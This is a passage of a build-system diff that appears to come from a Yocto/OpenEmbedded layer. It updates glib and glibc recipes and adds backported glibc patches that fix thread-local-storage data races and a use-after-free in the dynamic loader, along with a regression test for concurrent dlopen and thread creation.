-# This avoids the need to depend on target python3, which in case of mingw is not even possible.
-# meson's python configuration pokes into python3 configuration, so this provides the native config to it.
-unset _PYTHON_SYSCONFIGDATA_NAME
-
 S = "${WORKDIR}/glib-${PV}"
 
 PACKAGECONFIG ??= "system-pcre libmount \
diff --git a/meta/recipes-core/glib-networking/glib-networking_2.62.4.bb b/meta/recipes-core/glib-networking/glib-networking_2.62.4.bb
index b74532087c..c476a7cba5 100644
--- a/meta/recipes-core/glib-networking/glib-networking_2.62.4.bb
+++ b/meta/recipes-core/glib-networking/glib-networking_2.62.4.bb
@@ -31,4 +31,4 @@ FILES_${PN} += "\
 FILES_${PN}-dev += "${libdir}/gio/modules/libgio*.la"
 FILES_${PN}-staticdev += "${libdir}/gio/modules/libgio*.a"
 
-BBCLASSEXTEND = "native"
+BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-core/glibc/cross-localedef-native_2.31.bb b/meta/recipes-core/glibc/cross-localedef-native_2.31.bb
index 24de55d929..9aa24eccfe 100644
--- a/meta/recipes-core/glibc/cross-localedef-native_2.31.bb
+++ b/meta/recipes-core/glibc/cross-localedef-native_2.31.bb
@@ -20,7 +20,7 @@ inherit autotools
 FILESEXTRAPATHS =. "${FILE_DIRNAME}/${PN}:${FILE_DIRNAME}/glibc:"
 
 SRC_URI = "${GLIBC_GIT_URI};branch=${SRCBRANCH};name=glibc \
-           git://github.com/kraj/localedef;branch=master;name=localedef;destsuffix=git/localedef \
+           git://github.com/kraj/localedef;branch=master;name=localedef;destsuffix=git/localedef;protocol=https \
            \
            file://0001-localedef-Add-hardlink-resolver-to-build.patch;patchdir=localedef \
            \
diff --git a/meta/recipes-core/glibc/glibc-version.inc b/meta/recipes-core/glibc/glibc-version.inc
index 3bcd336de4..95e2bba301 100644
--- a/meta/recipes-core/glibc/glibc-version.inc
+++ b/meta/recipes-core/glibc/glibc-version.inc
@@ -1,6 +1,6 @@
 SRCBRANCH ?= "release/2.31/master"
 PV = "2.31+git${SRCPV}"
-SRCREV_glibc ?= "6fdf971c9dbf7dac9bea552113fe4694015bbc4d"
+SRCREV_glibc ?= "2d4f26e5cfda682f9ce61444b81533b83f6381af"
 SRCREV_localedef ?= "cd9f958c4c94a638fa7b2b4e21627364f1a1a655"
 
 GLIBC_GIT_URI ?= "git://sourceware.org/git/glibc.git"
diff --git a/meta/recipes-core/glibc/glibc.inc b/meta/recipes-core/glibc/glibc.inc
index 23a6ca99ae..e42040f3dc 100644
--- a/meta/recipes-core/glibc/glibc.inc
+++ b/meta/recipes-core/glibc/glibc.inc
@@ -1,7 +1,9 @@
 require glibc-common.inc
 require glibc-ld.inc
 
-DEPENDS = "virtual/${TARGET_PREFIX}gcc libgcc-initial linux-libc-headers"
+DEPENDS = "virtual/${TARGET_PREFIX}gcc virtual/${TARGET_PREFIX}binutils${BUSUFFIX} libgcc-initial linux-libc-headers"
+BUSUFFIX= ""
+BUSUFFIX:class-nativesdk = "-crosssdk"
 
 PROVIDES = "virtual/libc"
 PROVIDES += "virtual/libintl virtual/libiconv"
diff --git a/meta/recipes-core/glibc/glibc/0030-elf-Refactor_dl_update-slotinfo-to-avoid-use-after-free.patch b/meta/recipes-core/glibc/glibc/0030-elf-Refactor_dl_update-slotinfo-to-avoid-use-after-free.patch
new file mode 100644
index 0000000000..dba491f4dc
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0030-elf-Refactor_dl_update-slotinfo-to-avoid-use-after-free.patch
@@ -0,0 +1,66 @@
+From c0669ae1a629e16b536bf11cdd0865e0dbcf4bee Mon Sep 17 00:00:00 2001
+From: Szabolcs Nagy <szabolcs.nagy@arm.com>
+Date: Wed, 30 Dec 2020 21:52:38 +0000
+Subject: [PATCH] elf: Refactor _dl_update_slotinfo to avoid use after free
+
+map is not valid to access here because it can be freed by a concurrent
+dlclose: during tls access (via __tls_get_addr) _dl_update_slotinfo is
+called without holding dlopen locks. So don't check the modid of map.
+
+The map == 0 and map != 0 code paths can be shared (avoiding the dtv
+resize in case of map == 0 is just an optimization: larger dtv than
+necessary would be fine too).
+
+Reviewed-by: Adhemerval Zanella  <adhemerval.zanella@linaro.org>
+---
+ elf/dl-tls.c | 21 +++++----------------
+ 1 file changed, 5 insertions(+), 16 deletions(-)
+---
+Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=c0669ae1a629e16b536bf11cdd0865e0dbcf4bee]
+Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
+Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
+---
+diff --git a/elf/dl-tls.c b/elf/dl-tls.c
+index 24d00c14ef..f8b32b3ecb 100644
+--- a/elf/dl-tls.c
++++ b/elf/dl-tls.c
+@@ -743,6 +743,8 @@ _dl_update_slotinfo (unsigned long int req_modid)
+ 	{
+ 	  for (size_t cnt = total == 0 ? 1 : 0; cnt < listp->len; ++cnt)
+ 	    {
++	      size_t modid = total + cnt;
++
+ 	      size_t gen = listp->slotinfo[cnt].gen;
+ 
+ 	      if (gen > new_gen)
+@@ -758,25 +760,12 @@ _dl_update_slotinfo (unsigned long int req_modid)
+ 
+ 	      /* If there is no map this means the entry is empty.  */
+ 	      struct link_map *map = listp->slotinfo[cnt].map;
+-	      if (map == NULL)
+-		{
+-		  if (dtv[-1].counter >= total + cnt)
+-		    {
+-		      /* If this modid was used at some point the memory
+-			 might still be allocated.  */
+-		      free (dtv[total + cnt].pointer.to_free);
+-		      dtv[total + cnt].pointer.val = TLS_DTV_UNALLOCATED;
+-		      dtv[total + cnt].pointer.to_free = NULL;
+-		    }
+-
+-		  continue;
+-		}
+-
+ 	      /* Check whether the current dtv array is large enough.  */
+-	      size_t modid = map->l_tls_modid;
+-	      assert (total + cnt == modid);
+ 	      if (dtv[-1].counter < modid)
+ 		{
++		  if (map == NULL)
++		    continue;
++
+ 		  /* Resize the dtv.  */
+ 		  dtv = _dl_resize_dtv (dtv);
+ 
+-- 
+2.27.0
diff --git a/meta/recipes-core/glibc/glibc/0031-elf-Fix-data-races-in-pthread_create-and-TLS-access-BZ-19329.patch b/meta/recipes-core/glibc/glibc/0031-elf-Fix-data-races-in-pthread_create-and-TLS-access-BZ-19329.patch
new file mode 100644
index 0000000000..25beee1d50
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0031-elf-Fix-data-races-in-pthread_create-and-TLS-access-BZ-19329.patch
@@ -0,0 +1,191 @@
+From 1387ad6225c2222f027790e3f460e31aa5dd2c54 Mon Sep 17 00:00:00 2001
+From: Szabolcs Nagy <szabolcs.nagy@arm.com>
+Date: Wed, 30 Dec 2020 19:19:37 +0000
+Subject: [PATCH] elf: Fix data races in pthread_create and TLS access [BZ
+ #19329]
+
+DTV setup at thread creation (_dl_allocate_tls_init) is changed
+to take the dlopen lock, GL(dl_load_lock).  Avoiding data races
+here without locks would require design changes: the map that is
+accessed for static TLS initialization here may be concurrently
+freed by dlclose.  That use after free may be solved by only
+locking around static TLS setup or by ensuring dlclose does not
+free modules with static TLS, however currently every link map
+with TLS has to be accessed at least to see if it needs static
+TLS.  And even if that's solved, still a lot of atomics would be
+needed to synchronize DTV related globals without a lock. So fix
+both bug 19329 and bug 27111 with a lock that prevents DTV setup
+running concurrently with dlopen or dlclose.
+
+_dl_update_slotinfo at TLS access still does not use any locks
+so CONCURRENCY NOTES are added to explain the synchronization.
+The early exit from the slotinfo walk when max_modid is reached
+is not strictly necessary, but does not hurt either.
+
+An incorrect acquire load was removed from _dl_resize_dtv: it
+did not synchronize with any release store or fence and
+synchronization is now handled separately at thread creation
+and TLS access time.
+
+There are still a number of racy read accesses to globals that
+will be changed to relaxed MO atomics in a followup patch. This
+should not introduce regressions compared to existing behaviour
+and avoid cluttering the main part of the fix.
+
+Not all TLS access related data races got fixed here: there are
+additional races at lazy tlsdesc relocations see bug 27137.
+
+Reviewed-by: Adhemerval Zanella  <adhemerval.zanella@linaro.org>
+---
+ elf/dl-tls.c | 63 +++++++++++++++++++++++++++++++++++++++-------------
+ 1 file changed, 47 insertions(+), 16 deletions(-)
+---
+Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=1387ad6225c2222f027790e3f460e31aa5dd2c54]
+Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
+Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
+---
+diff --git a/elf/dl-tls.c b/elf/dl-tls.c
+index 6baff0c1ea..94f3cdbae0 100644
+--- a/elf/dl-tls.c
++++ b/elf/dl-tls.c
+@@ -475,14 +475,11 @@ extern dtv_t _dl_static_dtv[];
+ #endif
+ 
+ static dtv_t *
+-_dl_resize_dtv (dtv_t *dtv)
++_dl_resize_dtv (dtv_t *dtv, size_t max_modid)
+ {
+   /* Resize the dtv.  */
+   dtv_t *newp;
+-  /* Load GL(dl_tls_max_dtv_idx) atomically since it may be written to by
+-     other threads concurrently.  */
+-  size_t newsize
+-    = atomic_load_acquire (&GL(dl_tls_max_dtv_idx)) + DTV_SURPLUS;
++  size_t newsize = max_modid + DTV_SURPLUS;
+   size_t oldsize = dtv[-1].counter;
+ 
+   if (dtv == GL(dl_initial_dtv))
+@@ -528,11 +525,14 @@ _dl_allocate_tls_init (void *result)
+   size_t total = 0;
+   size_t maxgen = 0;
+ 
++  /* Protects global dynamic TLS related state.  */
++  __rtld_lock_lock_recursive (GL(dl_load_lock));
++
+   /* Check if the current dtv is big enough.   */
+   if (dtv[-1].counter < GL(dl_tls_max_dtv_idx))
+     {
+       /* Resize the dtv.  */
+-      dtv = _dl_resize_dtv (dtv);
++      dtv = _dl_resize_dtv (dtv, GL(dl_tls_max_dtv_idx));
+ 
+       /* Install this new dtv in the thread data structures.  */
+       INSTALL_DTV (result, &dtv[-1]);
+@@ -600,6 +600,7 @@ _dl_allocate_tls_init (void *result)
+       listp = listp->next;
+       assert (listp != NULL);
+     }
++  __rtld_lock_unlock_recursive (GL(dl_load_lock));
+ 
+   /* The DTV version is up-to-date now.  */
+   dtv[0].counter = maxgen;
+@@ -734,12 +735,29 @@ _dl_update_slotinfo (unsigned long int req_modid)
+ 
+   if (dtv[0].counter < listp->slotinfo[idx].gen)
+     {
+-      /* The generation counter for the slot is higher than what the
+-	 current dtv implements.  We have to update the whole dtv but
+-	 only those entries with a generation counter <= the one for
+-	 the entry we need.  */
++      /* CONCURRENCY NOTES:
++
++	 Here the dtv needs to be updated to new_gen generation count.
++
++	 This code may be called during TLS access when GL(dl_load_lock)
++	 is not held.  In that case the user code has to synchronize with
++	 dlopen and dlclose calls of relevant modules.  A module m is
++	 relevant if the generation of m <= new_gen and dlclose of m is
++	 synchronized: a memory access here happens after the dlopen and
++	 before the dlclose of relevant modules.  The dtv entries for
++	 relevant modules need to be updated, other entries can be
++	 arbitrary.
++
++	 This e.g. means that the first part of the slotinfo list can be
++	 accessed race free, but the tail may be concurrently extended.
++	 Similarly relevant slotinfo entries can be read race free, but
++	 other entries are racy.  However updating a non-relevant dtv
++	 entry does not affect correctness.  For a relevant module m,
++	 max_modid >= modid of m.  */
+       size_t new_gen = listp->slotinfo[idx].gen;
+       size_t total = 0;
++      size_t max_modid  = atomic_load_relaxed (&GL(dl_tls_max_dtv_idx));
++      assert (max_modid >= req_modid);
+ 
+       /* We have to look through the entire dtv slotinfo list.  */
+       listp =  GL(dl_tls_dtv_slotinfo_list);
+@@ -749,12 +767,14 @@ _dl_update_slotinfo (unsigned long int req_modid)
+ 	    {
+ 	      size_t modid = total + cnt;
+ 
++	      /* Later entries are not relevant.  */
++	      if (modid > max_modid)
++		break;
++
+ 	      size_t gen = listp->slotinfo[cnt].gen;
+ 
+ 	      if (gen > new_gen)
+-		/* This is a slot for a generation younger than the
+-		   one we are handling now.  It might be incompletely
+-		   set up so ignore it.  */
++		/* Not relevant.  */
+ 		continue;
+ 
+ 	      /* If the entry is older than the current dtv layout we
+@@ -771,7 +791,7 @@ _dl_update_slotinfo (unsigned long int req_modid)
+ 		    continue;
+ 
+ 		  /* Resize the dtv.  */
+-		  dtv = _dl_resize_dtv (dtv);
++		  dtv = _dl_resize_dtv (dtv, max_modid);
+ 
+ 		  assert (modid <= dtv[-1].counter);
+ 
+@@ -793,8 +813,17 @@ _dl_update_slotinfo (unsigned long int req_modid)
+ 	    }
+ 
+ 	  total += listp->len;
++	  if (total > max_modid)
++	    break;
++
++	  /* Synchronize with _dl_add_to_slotinfo.  Ideally this would
++	     be consume MO since we only need to order the accesses to
++	     the next node after the read of the address and on most
++	     hardware (other than alpha) a normal load would do that
++	     because of the address dependency.  */
++	  listp = atomic_load_acquire (&listp->next);
+ 	}
+-      while ((listp = listp->next) != NULL);
++      while (listp != NULL);
+ 
+       /* This will be the new maximum generation counter.  */
+       dtv[0].counter = new_gen;
+@@ -986,7 +1015,7 @@ _dl_add_to_slotinfo (struct link_map *l, bool do_add)
+ 	 the first slot.  */
+       assert (idx == 0);
+ 
+-      listp = prevp->next = (struct dtv_slotinfo_list *)
++      listp = (struct dtv_slotinfo_list *)
+ 	malloc (sizeof (struct dtv_slotinfo_list)
+ 		+ TLS_SLOTINFO_SURPLUS * sizeof (struct dtv_slotinfo));
+       if (listp == NULL)
+@@ -1000,6 +1029,8 @@ cannot create TLS data structures"));
+       listp->next = NULL;
+       memset (listp->slotinfo, '\0',
+ 	      TLS_SLOTINFO_SURPLUS * sizeof (struct dtv_slotinfo));
++      /* Synchronize with _dl_update_slotinfo.  */
++      atomic_store_release (&prevp->next, listp);
+     }
+ 
+   /* Add the information into the slotinfo data structure.  */
+-- 
+2.27.0
diff --git a/meta/recipes-core/glibc/glibc/0032-elf-Use-relaxed-atomics-for-racy-accesses-BZ-19329.patch b/meta/recipes-core/glibc/glibc/0032-elf-Use-relaxed-atomics-for-racy-accesses-BZ-19329.patch
new file mode 100644
index 0000000000..eb8ef3161c
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0032-elf-Use-relaxed-atomics-for-racy-accesses-BZ-19329.patch
@@ -0,0 +1,206 @@
+From f4f8f4d4e0f92488431b268c8cd9555730b9afe9 Mon Sep 17 00:00:00 2001
+From: Szabolcs Nagy <szabolcs.nagy@arm.com>
+Date: Wed, 30 Dec 2020 19:19:37 +0000
+Subject: [PATCH] elf: Use relaxed atomics for racy accesses [BZ #19329]
+
+This is a follow up patch to the fix for bug 19329.  This adds relaxed
+MO atomics to accesses that were previously data races but are now
+race conditions, and where relaxed MO is sufficient.
+
+The race conditions all follow the pattern that the write is behind the
+dlopen lock, but a read can happen concurrently (e.g. during tls access)
+without holding the lock.  For slotinfo entries the read value only
+matters if it reads from a synchronized write in dlopen or dlclose,
+otherwise the related dtv entry is not valid to access so it is fine
+to leave it in an inconsistent state.  The same applies for
+GL(dl_tls_max_dtv_idx) and GL(dl_tls_generation), but there the
+algorithm relies on the fact that the read of the last synchronized
+write is an increasing value.
+
+Reviewed-by: Adhemerval Zanella  <adhemerval.zanella@linaro.org>
+---
+ elf/dl-close.c          | 20 +++++++++++++-------
+ elf/dl-open.c           |  5 ++++-
+ elf/dl-tls.c            | 31 +++++++++++++++++++++++--------
+ sysdeps/x86_64/dl-tls.c |  3 ++-
+ 4 files changed, 42 insertions(+), 17 deletions(-)
+---
+Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=f4f8f4d4e0f92488431b268c8cd9555730b9afe9]
+Comment: Hunks from elf/dl-open.c and elf/dl-tls.c are refreshed due to offset change.
+Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
+Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
+---
+diff --git a/elf/dl-close.c b/elf/dl-close.c
+index c51becd06b..3720e47dd1 100644
+--- a/elf/dl-close.c
++++ b/elf/dl-close.c
+@@ -79,9 +79,10 @@ remove_slotinfo (size_t idx, struct dtv_slotinfo_list *listp, size_t disp,
+ 	{
+ 	  assert (old_map->l_tls_modid == idx);
+ 
+-	  /* Mark the entry as unused. */
+-	  listp->slotinfo[idx - disp].gen = GL(dl_tls_generation) + 1;
+-	  listp->slotinfo[idx - disp].map = NULL;
++	  /* Mark the entry as unused.  These can be read concurrently.  */
++	  atomic_store_relaxed (&listp->slotinfo[idx - disp].gen,
++				GL(dl_tls_generation) + 1);
++	  atomic_store_relaxed (&listp->slotinfo[idx - disp].map, NULL);
+ 	}
+ 
+       /* If this is not the last currently used entry no need to look
+@@ -96,8 +97,8 @@ remove_slotinfo (size_t idx, struct dtv_slotinfo_list *listp, size_t disp,
+ 
+       if (listp->slotinfo[idx - disp].map != NULL)
+ 	{
+-	  /* Found a new last used index.  */
+-	  GL(dl_tls_max_dtv_idx) = idx;
++	  /* Found a new last used index.  This can be read concurrently.  */
++	  atomic_store_relaxed (&GL(dl_tls_max_dtv_idx), idx);
+ 	  return true;
+ 	}
+     }
+@@ -571,7 +572,9 @@ _dl_close_worker (struct link_map *map, bool force)
+ 					GL(dl_tls_dtv_slotinfo_list), 0,
+ 					imap->l_init_called))
+ 		/* All dynamically loaded modules with TLS are unloaded.  */
+-		GL(dl_tls_max_dtv_idx) = GL(dl_tls_static_nelem);
++		/* Can be read concurrently.  */
++		atomic_store_relaxed (&GL(dl_tls_max_dtv_idx),
++				      GL(dl_tls_static_nelem));
+ 
+ 	      if (imap->l_tls_offset != NO_TLS_OFFSET
+ 		  && imap->l_tls_offset != FORCED_DYNAMIC_TLS_OFFSET)
+@@ -769,8 +772,11 @@ _dl_close_worker (struct link_map *map, bool force)
+   /* If we removed any object which uses TLS bump the generation counter.  */
+   if (any_tls)
+     {
+-      if (__glibc_unlikely (++GL(dl_tls_generation) == 0))
++      size_t newgen = GL(dl_tls_generation) + 1;
++      if (__glibc_unlikely (newgen == 0))
+ 	_dl_fatal_printf ("TLS generation counter wrapped!  Please report as described in "REPORT_BUGS_TO".\n");
++      /* Can be read concurrently.  */
++      atomic_store_relaxed (&GL(dl_tls_generation), newgen);
+ 
+       if (tls_free_end == GL(dl_tls_static_used))
+ 	GL(dl_tls_static_used) = tls_free_start;
+diff --git a/elf/dl-open.c b/elf/dl-open.c
+index 09f0df7d38..bb79ef00f1 100644
+--- a/elf/dl-open.c
++++ b/elf/dl-open.c
+@@ -387,9 +387,12 @@
+ 	}
+     }
+ 
+-  if (__builtin_expect (++GL(dl_tls_generation) == 0, 0))
++  size_t newgen = GL(dl_tls_generation) + 1;
++  if (__glibc_unlikely (newgen == 0))
+     _dl_fatal_printf (N_("\
+ TLS generation counter wrapped!  Please report this."));
++  /* Can be read concurrently.  */
++  atomic_store_relaxed (&GL(dl_tls_generation), newgen);
+ 
+   /* We need a second pass for static tls data, because
+      _dl_update_slotinfo must not be run while calls to
+diff --git a/elf/dl-tls.c b/elf/dl-tls.c
+index 94f3cdbae0..dc69cd984e 100644
+--- a/elf/dl-tls.c
++++ b/elf/dl-tls.c
+@@ -96,7 +96,9 @@
+       /* No gaps, allocate a new entry.  */
+     nogaps:
+ 
+-      result = ++GL(dl_tls_max_dtv_idx);
++      result = GL(dl_tls_max_dtv_idx) + 1;
++      /* Can be read concurrently.  */
++      atomic_store_relaxed (&GL(dl_tls_max_dtv_idx), result);
+     }
+ 
+   return result;
+@@ -279,10 +281,12 @@
+   dtv_t *dtv;
+   size_t dtv_length;
+ 
++  /* Relaxed MO, because the dtv size is later rechecked, not relied on.  */
++  size_t max_modid = atomic_load_relaxed (&GL(dl_tls_max_dtv_idx));
+   /* We allocate a few more elements in the dtv than are needed for the
+      initial set of modules.  This should avoid in most cases expansions
+      of the dtv.  */
+-  dtv_length = GL(dl_tls_max_dtv_idx) + DTV_SURPLUS;
++  dtv_length = max_modid + DTV_SURPLUS;
+   dtv = calloc (dtv_length + 2, sizeof (dtv_t));
+   if (dtv != NULL)
+     {
+@@ -687,7 +691,7 @@
+ 	      if (modid > max_modid)
+ 		break;
+ 
+-	      size_t gen = listp->slotinfo[cnt].gen;
++	      size_t gen = atomic_load_relaxed (&listp->slotinfo[cnt].gen);
+ 
+ 	      if (gen > new_gen)
+ 		/* Not relevant.  */
+@@ -699,7 +703,8 @@
+ 		continue;
+ 
+ 	      /* If there is no map this means the entry is empty.  */
+-	      struct link_map *map = listp->slotinfo[cnt].map;
++	      struct link_map *map
++		= atomic_load_relaxed (&listp->slotinfo[cnt].map);
+ 	      /* Check whether the current dtv array is large enough.  */
+ 	      if (dtv[-1].counter < modid)
+ 		{
+@@ -843,7 +848,12 @@
+ {
+   dtv_t *dtv = THREAD_DTV ();
+ 
+-  if (__glibc_unlikely (dtv[0].counter != GL(dl_tls_generation)))
++  /* Update is needed if dtv[0].counter < the generation of the accessed
++     module.  The global generation counter is used here as it is easier
++     to check.  Synchronization for the relaxed MO access is guaranteed
++     by user code, see CONCURRENCY NOTES in _dl_update_slotinfo.  */
++  size_t gen = atomic_load_relaxed (&GL(dl_tls_generation));
++  if (__glibc_unlikely (dtv[0].counter != gen))
+     return update_get_addr (GET_ADDR_PARAM);
+ 
+   void *p = dtv[GET_ADDR_MODULE].pointer.val;
+@@ -866,7 +876,10 @@
+     return NULL;
+ 
+   dtv_t *dtv = THREAD_DTV ();
+-  if (__glibc_unlikely (dtv[0].counter != GL(dl_tls_generation)))
++  /* This may be called without holding the GL(dl_load_lock).  Reading
++     arbitrary gen value is fine since this is best effort code.  */
++  size_t gen = atomic_load_relaxed (&GL(dl_tls_generation));
++  if (__glibc_unlikely (dtv[0].counter != gen))
+     {
+       /* This thread's DTV is not completely current,
+ 	 but it might already cover this module.  */
+@@ -961,7 +974,9 @@
+   /* Add the information into the slotinfo data structure.  */
+   if (do_add)
+     {
+-      listp->slotinfo[idx].map = l;
+-      listp->slotinfo[idx].gen = GL(dl_tls_generation) + 1;
++      /* Can be read concurrently.  See _dl_update_slotinfo.  */
++      atomic_store_relaxed (&listp->slotinfo[idx].map, l);
++      atomic_store_relaxed (&listp->slotinfo[idx].gen,
++			    GL(dl_tls_generation) + 1);
+     }
+ }
+ 
+diff --git a/sysdeps/x86_64/dl-tls.c b/sysdeps/x86_64/dl-tls.c
+index 6595f6615b..24ef560b71 100644
+--- a/sysdeps/x86_64/dl-tls.c
++++ b/sysdeps/x86_64/dl-tls.c
+@@ -40,7 +40,8 @@ __tls_get_addr_slow (GET_ADDR_ARGS)
+ {
+   dtv_t *dtv = THREAD_DTV ();
+ 
+-  if (__glibc_unlikely (dtv[0].counter != GL(dl_tls_generation)))
++  size_t gen = atomic_load_relaxed (&GL(dl_tls_generation));
++  if (__glibc_unlikely (dtv[0].counter != gen))
+     return update_get_addr (GET_ADDR_PARAM);
+ 
+   return tls_get_addr_tail (GET_ADDR_PARAM, dtv, NULL);
+-- 
+2.27.0
diff --git a/meta/recipes-core/glibc/glibc/0033-elf-Add-test-case-for-BZ-19329.patch b/meta/recipes-core/glibc/glibc/0033-elf-Add-test-case-for-BZ-19329.patch
new file mode 100644
index 0000000000..f22e52ea99
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0033-elf-Add-test-case-for-BZ-19329.patch
@@ -0,0 +1,144 @@
+From 9d0e30329c23b5ad736fda3f174208c25970dbce Mon Sep 17 00:00:00 2001
+From: Szabolcs Nagy <szabolcs.nagy@arm.com>
+Date: Tue, 13 Dec 2016 12:28:41 +0000
+Subject: [PATCH] elf: Add test case for [BZ #19329]
+
+Test concurrent dlopen and pthread_create when the loaded modules have
+TLS.  This triggers dl-tls assertion failures more reliably than the
+nptl/tst-stack4 test.
+
+The dlopened module has 100 DT_NEEDED dependencies with TLS, they were
+reused from an existing TLS test. The number of created threads during
+dlopen depends on filesystem speed and hardware, but at most 3 threads
+are alive at a time to limit resource usage.
+
+Reviewed-by: Adhemerval Zanella  <adhemerval.zanella@linaro.org>
+---
+ elf/Makefile       |  9 ++++--
+ elf/tst-tls21.c    | 68 ++++++++++++++++++++++++++++++++++++++++++++++
+ elf/tst-tls21mod.c |  1 +
+ 3 files changed, 76 insertions(+), 2 deletions(-)
+ create mode 100644 elf/tst-tls21.c
+ create mode 100644 elf/tst-tls21mod.c
+---
+Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=9d0e30329c23b5ad736fda3f174208c25970dbce]
+Comment: Hunks from elf/Makefile are refreshed as per glibc 2.31 codebase.
+Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
+Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
+---
+diff --git a/elf/Makefile b/elf/Makefile
+index d3e909637a..3241cb6046 100644
+--- a/elf/Makefile
++++ b/elf/Makefile
+@@ -201,7 +201,7 @@
+ 	 tst-unwind-ctor tst-unwind-main tst-audit13 \
+ 	 tst-sonamemove-link tst-sonamemove-dlopen tst-dlopen-tlsmodid \
+ 	 tst-dlopen-self tst-auditmany tst-initfinilazyfail tst-dlopenfail \
+-	 tst-dlopenfail-2
++	 tst-dlopenfail-2 tst-tls21
+ #	 reldep9
+ tests-internal += loadtest unload unload2 circleload1 \
+ 	 neededtest neededtest2 neededtest3 neededtest4 \
+@@ -312,7 +312,7 @@
+ 		tst-auditmanymod7 tst-auditmanymod8 tst-auditmanymod9 \
+ 		tst-initlazyfailmod tst-finilazyfailmod \
+ 		tst-dlopenfailmod1 tst-dlopenfaillinkmod tst-dlopenfailmod2 \
+-		tst-dlopenfailmod3 tst-ldconfig-ld-mod
++		tst-dlopenfailmod3 tst-ldconfig-ld-mod tst-tls21mod
+ # Most modules build with _ISOMAC defined, but those filtered out
+ # depend on internal headers.
+ modules-names-tests = $(filter-out ifuncmod% tst-libc_dlvsym-dso tst-tlsmod%,\
+@@ -1697,5 +1697,10 @@
+   $(objpfx)tst-dlopen-nodelete-reloc-mod16.so
+ LDFLAGS-tst-dlopen-nodelete-reloc-mod17.so = -Wl,--no-as-needed
+ 
++# Reuses tst-tls-many-dynamic-modules
++$(objpfx)tst-tls21: $(libdl) $(shared-thread-library)
++$(objpfx)tst-tls21.out: $(objpfx)tst-tls21mod.so
++$(objpfx)tst-tls21mod.so: $(tst-tls-many-dynamic-modules:%=$(objpfx)%.so)
++
+ $(objpfx)tst-ldconfig-ld_so_conf-update.out: $(objpfx)tst-ldconfig-ld-mod.so
+ $(objpfx)tst-ldconfig-ld_so_conf-update: $(libdl)
+diff --git a/elf/tst-tls21.c b/elf/tst-tls21.c
+new file mode 100644
+index 0000000000..560bf5813a
+--- /dev/null
++++ b/elf/tst-tls21.c
+@@ -0,0 +1,68 @@
++/* Test concurrent dlopen and pthread_create: BZ 19329.
++   Copyright (C) 2021 Free Software Foundation, Inc.
++   This file is part of the GNU C Library.
++
++   The GNU C Library is free software; you can redistribute it and/or
++   modify it under the terms of the GNU Lesser General Public
++   License as published by the Free Software Foundation; either
++   version 2.1 of the License, or (at your option) any later version.
++
++   The GNU C Library is distributed in the hope that it will be useful,
++   but WITHOUT ANY WARRANTY; without even the implied warranty of
++   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
++   Lesser General Public License for more details.
++
++   You should have received a copy of the GNU Lesser General Public
++   License along with the GNU C Library; if not, see
++   <http://www.gnu.org/licenses/>.  */
++
++#include <dlfcn.h>
++#include <pthread.h>
++#include <stdio.h>
++#include <stdatomic.h>
++#include <support/xdlfcn.h>
++#include <support/xthread.h>
++
++#define THREADS 10000
++
++static atomic_int done;
++
++static void *
++start (void *a)
++{
++  /* Load a module with many dependencies that each have TLS.  */
++  xdlopen ("tst-tls21mod.so", RTLD_LAZY);
++  atomic_store_explicit (&done, 1, memory_order_release);
++  return 0;
++}
++
++static void *
++nop (void *a)
++{
++  return 0;
++}
++
++static int
++do_test (void)
++{
++  pthread_t t1, t2;
++  int i;
++
++  /* Load a module with lots of dependencies and TLS.  */
++  t1 = xpthread_create (0, start, 0);
++
++  /* Concurrently create lots of threads until dlopen is observably done.  */
++  for (i = 0; i < THREADS; i++)
++    {
++      if (atomic_load_explicit (&done, memory_order_acquire) != 0)
++	break;
++      t2 = xpthread_create (0, nop, 0);
++      xpthread_join (t2);
++    }
++
++  xpthread_join (t1);
++  printf ("threads created during dlopen: %d\n", i);
++  return 0;
++}
++
++#include <support/test-driver.c>
+diff --git a/elf/tst-tls21mod.c b/elf/tst-tls21mod.c
+new file mode 100644
+index 0000000000..206ece4fb3
+--- /dev/null
++++ b/elf/tst-tls21mod.c
+@@ -0,0 +1 @@
++int __thread x;
+-- 
+2.27.0
diff --git a/meta/recipes-core/glibc/glibc/0034-elf-Fix-DTV-gap-reuse-logic-BZ-27135.patch b/meta/recipes-core/glibc/glibc/0034-elf-Fix-DTV-gap-reuse-logic-BZ-27135.patch
new file mode 100644
index 0000000000..a87afe3230
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0034-elf-Fix-DTV-gap-reuse-logic-BZ-27135.patch
@@ -0,0 +1,180 @@
+From ba33937be210da5d07f7f01709323743f66011ce Mon Sep 17 00:00:00 2001
+From: Adhemerval Zanella <adhemerval.zanella@linaro.org>
+Date: Fri, 25 Jun 2021 10:54:12 -0300
+Subject: [PATCH] elf: Fix DTV gap reuse logic (BZ #27135)
+
+This is updated version of the 572bd547d57a (reverted by 40ebfd016ad2)
+that fixes the _dl_next_tls_modid issues.
+
+This issue with 572bd547d57a patch is the DTV entry will be only
+update on dl_open_worker() with the update_tls_slotinfo() call after
+all dependencies are being processed by _dl_map_object_deps().  However
+_dl_map_object_deps() itself might call _dl_next_tls_modid(), and since
+the _dl_tls_dtv_slotinfo_list::map is not yet set the entry will be
+wrongly reused.
+
+This patch fixes by renaming the _dl_next_tls_modid() function to
+_dl_assign_tls_modid() and by passing the link_map so it can set
+the slotinfo value so a subsequente _dl_next_tls_modid() call will
+see the entry as allocated.
+
+The intermediary value is cleared up on remove_slotinfo() for the case
+a library fails to load with RTLD_NOW.
+
+This patch fixes BZ #27135.
+
+Checked on x86_64-linux-gnu.
+
